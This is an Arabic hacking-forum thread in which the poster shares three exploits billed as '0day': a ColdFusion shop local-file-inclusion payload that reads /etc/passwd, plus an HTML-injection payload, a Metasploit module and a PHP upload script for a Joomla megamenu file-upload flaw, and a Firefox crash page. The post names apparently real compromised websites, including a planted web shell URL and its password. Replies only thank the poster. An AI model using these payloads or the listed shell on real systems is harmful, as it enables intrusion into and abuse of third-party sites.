1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : سلطان القلوب | المشاهدات : 2,501 | الردود : 4
حالة الموضوع:
مغلق
  1. سلطان القلوب DeveloPer Plus

    الأنتساب:
    ‏2 نوفمبر 2012
    المشاركات:
    19
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    الإقامة:
    D Z
    [​IMG]


    اخواني الكرام كيف حالك ان شاء الله بخير تكونو ياربي


    اليوم اضع بين ايديكم 3 ثغرات 0day


    للتنويه هذه الثغرات 0day يعني ما حد يعرف بيها وبالتالي ليست مرقعه وهذا التعريف لبعض السائلين *:"


    طبعآ الثغرات من تجميعة المبدع The Injector


    الثغرة الاولى : (( ColdFusion E-Commerce (SHOP) <= Local File Include Vulnerability ))


    كود PHP:
    ColdFusion E-Commerce (SHOP) <= Local File Include Vulnerability
    1
    -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
    0 _ __ __ __ 1
    /' \ __ /'__`\ /\ \__ /'__`\ 0
    /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
    \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
    0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
    1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
    0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
    1 \ \____/ >> Exploit database separated by exploit 0
    0 \/___/ type (local, remote, DoS, etc.) 1
    1 1
    0 [+] Site : 1337day.com 0
    1 [+] Support e-mail : submit[at]1337day.com 1
    0 0
    1 ######################################### 1
    0 I'm KedAns-Dz member from Inj3ct0r Team 1
    1 ######################################### 0
    0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

    ###
    # Title : ColdFusion E-Commerce (SHOP) <= Multiple Vulnerabilities
    # Author : KedAns-Dz
    # E-mail : ked-h (@hotmail.com / @1337day.com)
    # Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
    # Web Site : www.1337day.com .net .org
    # FaCeb0ok : http://fb.me/Inj3ct0rK3d
    # TwiTter : @kedans
    # Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
    # Platform/CatID : remote - Multiple
    # Type : proof of concept - webapp 0day - remote
    # Tested on : Windows7
    # Download : [http://www.adobe.com/products/coldfusion-family.html]
    ###

    # <3 <3 Greetings t0 Palestine <3 <3
    # F-ck HaCking, Lov3 Explo8ting !

    ######## [ Proof / Exploit ] ################|=>

    ##################
    # [!] Description:
    ------------------
    Adobe ColdFusion suffer from multiple vulnerabilities / bugs in 
    ColdFusion-SHOP , the attacker can use some bug in the software 
    to inject some remote command/code ( LFI / HTML Injection ).
    #########

    ####> (1) LFI (Local file Include) :
    -----------------------------
    * the bug in Function ' view= ' :
    * [ex:] => [target]/[cfshop-path]/default.cfm?view= [ + LFI + ]

    * [ + LFI + ] => ../../../../../../../../../../../../../../../../../../../../../etc/passwd%00.jpg

    [+] LFI Exploit ( Demo ):=>
    http://shop.mbc.net/default.cfm?refp.../passwd%00.jpg
    http://shop.mbc.net/default.cfm?view.../passwd%00.jpg

    proof image : (http://i49.tinypic.com/23vlr9e.png)

    ####> (2) HTML Injection :
    -------------------
    * the bug in Function ' searchkey= '
    * [ex:] : &searchkey= [ HTML Code ]

    * [ HTML Code ] ex:=> "><h1><center>HaCked By KedAns-Dz</h1>

    [+] Demo : 
    http://www.citrusstv.com/shop/defaul...ns-Dz%3C/h1%3E
    http://www.citrusstv.com/shop/defaul...3C%2Fscript%3E

    proof image : (http://i49.tinypic.com/f37uvl.png)

    ########################

    # Sp.ThanX 2 : Yahya Pain & Evil-Dz , 

    #================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
    # Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
    # Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
    # +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
    # Inj3ct0r Members 31337 : KedAns  * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
    # NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Zx * HD Moore * YMCMB ..all
    # Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
    # packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
    #================================================= ================================================== =========

    1337day.com [2013-01-26]
    الثغرة الثانيه : (( joomla mega menu file upload ))

    كود PHP:
    #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
    #        _                                 __              __      __                                    #
    #   /' \                        __  /'__`\              /\ \__  /'__`\                             #
    #  /\_, \       ___   /\_\/\_\ \ \      ___\ \ ,_\/\ \/\ \  _ ___                  #
    #  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\             #
    #        \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            #
    #         \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            #
    #          \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            #
    #                                 \ \____/ >> Exploit database separated by exploit   #
    #                                  \/___/                 type (local, remote, DoS, etc.)       #
    #                                                                                                                                         #
    #  [+] Site                     : 1337day.com                                                              #
    #  [+] Support e-mail  : submit[at]1337day.com                                           #
    #                                                                                                                                         #
    #                          #########################################                      #
    #                          I'm The Black Devils member from Inj3ct0r Team                #
    #                          #########################################                      #
    #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
    ##
    # This Exploit must be use in Metasploit Framework
    # http://metasploit.com/framework/
    # This module created by The Black Devils
    ##

    require 'msf/core'
    require 'msf/core/exploit/php_exe'

    class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::PhpEXE

    def initialize(info = {})
    super(update_info(info,
    'Name'             => ' joomla! megamenu module 'uploadify.php' Arbitrary File Upload Vulnerability',
    'Description'   => %q{
    This module exploits a vulnerability found in joomla module
    By abusing the image.php file, a malicious user can upload a file to a
    temp directory without authentication, which results in arbitrary code execution.
    },
    'Author'                 =>
    [
    'The Black Devils', # initial discovery
    ],
    'License'               => MSF_LICENSE,
    'References'     =>
    [
    [ 'OSVDB', '82656' ],

    ],
    'Payload'               =>
    {
    'BadChars' => "\x00",
    },
    'Platform'         => 'php',
    'Arch'             => ARCH_PHP,
    'Targets'               =>
    [
    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
    [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
    ],
    'DefaultTarget'  => 0,
    'DisclosureDate' => 'Mar 26 2012'))

    register_options(
    [
    OptString.new('TARGETURI', [true, 'The full URI path to joomla', '/joomla'])
    ], self.class)
    end

    def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
    'method' => 'GET',
    'uri'   => "#{uri}modules/megamenu/uploadify/uploadify.php"
    })

    if not res or res.code != 200
    return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
    end

    def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}modules/megamenu/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
    'method' => 'POST',
    'uri'   => "#{uri}modules/megamenu/uploadify/uploadify.php",
    'ctype'  => "multipart/form-data; boundary=#{data.bound}",
    'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
    fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
    'uri'   => upload_uri,
    'method' => 'GET'
    })
    end
    end

    #------------Arbitrary File Upload Vulnerability------
    <?php
    $uploadfile
    ="cyber.php.gif";
    $ch curl_init("http://localhost/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/");
    curl_setopt($chCURLOPT_POSTtrue);
    curl_setopt($chCURLOPT_POSTFIELDS,
    array(
    'Filedata'=>"@$uploadfile"));
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    $postResult curl_exec($ch);
    curl_close($ch);
    print 
    "$postResult";
    ?>
    Shell Access : http://localhost/modules/megamenu/uploadify/cyber.php.gif
    <?php
    phpinfo
    ();
    ?>
    #------------------
    DEMO
    http://www.produits-corses.fr/modules/megamenu-/uploadify/uploadify.php
    http://enayar.fr/modules/megamenu/uploadify/uploadify.php
    http://www.satisfaction-gsm.com/modules/megamenu/uploadify/uploadify.php
    http://prestashop.kyrnova.com/modules/megamenu-/uploadify/uploadify.php

    shell
    http://www.produits-corses.fr/modules/megamenu/uploadify//cyber.php
    pass:oeb1590

    # 6C3109D932754DAC   1337day.com [2013-01-09]   3E4098CEC9DB5A5A #

    الثغرة الثالثه : (( mozilla firefox corruption memory ))

    كود PHP:
    -->
     
    <
    html>
    <
    head>
    <
    title>Memory Corruption bY KedAns-Dz</title>
    <**** 
    onload="**********:KedAns();">
    <
    script ********="**********">
    function 
    KedAns()
    {
     
    // (puf) it's just for make a buffer and Crash !
    // some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes
    var puf =unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
    puf+=unescape("??");
     
    ********.
    write(puf); // Buffer1
     
    var buffer '\x41\x42\x43' // ABC buffer
    for(i=0<= 999 ; ++i)
    {
    buffer+=buffer+buffer
    ********.write(buffer); // Corrupt this !!!
     
    }
     
    // [ Memory Corruption !! (*__^) ]
     

    </script>
    </head>
    </****>
    </html>
    <!--


    ايضآ تم ارفاق الثغرات


    :{12}:​
     

    الملفات المرفقة:

  2. روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    50
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     
  3. X-1 Developer

    الأنتساب:
    ‏10 يونيو 2012
    المشاركات:
    69
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    X
    نظام التشغيل:
    Linux
    رد: لعيونكم ثلاث ثغرات 0day

    سلام عليكم ورحمة الله وبركاته
    جزاك الله الف خير
     
  4. Norilkon Developer

    الأنتساب:
    ‏8 ابريل 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    مــصــر
    رد: لعيونكم ثلاث ثغرات 0day

    الله يعطيك الف عآفية
     
  5. Norilkon Developer

    الأنتساب:
    ‏8 ابريل 2012
    المشاركات:
    84
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    مــصــر
    رد: لعيونكم ثلاث ثغرات 0day

    تم التقيم
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة